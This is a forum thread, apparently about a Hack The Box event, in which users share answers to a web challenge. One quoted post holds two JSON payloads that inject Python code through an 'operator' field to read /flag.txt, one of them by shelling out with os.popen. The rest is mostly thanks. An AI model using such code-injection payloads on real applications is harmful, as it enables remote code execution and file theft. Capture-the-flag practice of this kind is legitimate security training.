Return to forum

nuki · October 23, 2022 at 6:02 PM

(October 23, 2022, 05:51 PM)o2n Wrote: {"current_health":"100","attack_power":"100","operator":"+ 1; result=open('/flag.txt', 'r').readline()#"}

{"current_health":"100","attack_power":"100","operator":"; result=__import__('os').popen('cat /flag.txt').read();"}

Tried both in burp for web challenge, still the request is "HTB{f4k3_fl4g_f0r_t3st1ng}"

Sounds like you are testing it against you own target? You have to spawn the docker instance on the challenge page

may123a · October 23, 2022 at 6:18 PM

thanks

donutz · October 23, 2022 at 7:12 PM

(October 22, 2022, 02:56 PM)lnf02 Wrote: Hey guys!

Sharing a few resolutions for the new HTB Event.
Web challenge:
You can manipulate the "operator" parameter...

Currently working on the Crypto Challenge...

Thanks!

rillette · October 23, 2022 at 7:41 PM

thanx!

jusdevelop29 · October 23, 2022 at 7:49 PM

ty 😊

RootAbuser · October 23, 2022 at 8:00 PM

tyvm!

riversiderock · October 23, 2022 at 8:29 PM

thanks

yeahyeah28 · October 23, 2022 at 9:08 PM

(October 22, 2022, 02:56 PM)lnf02 Wrote: Hey guys!

Sharing a few resolutions for the new HTB Event.
Web challenge:
You can manipulate the "operator" parameter...

Currently working on the Crypto Challenge...

thx

sla6t · October 23, 2022 at 9:34 PM

thanks

killerbee · October 23, 2022 at 10:53 PM

thanks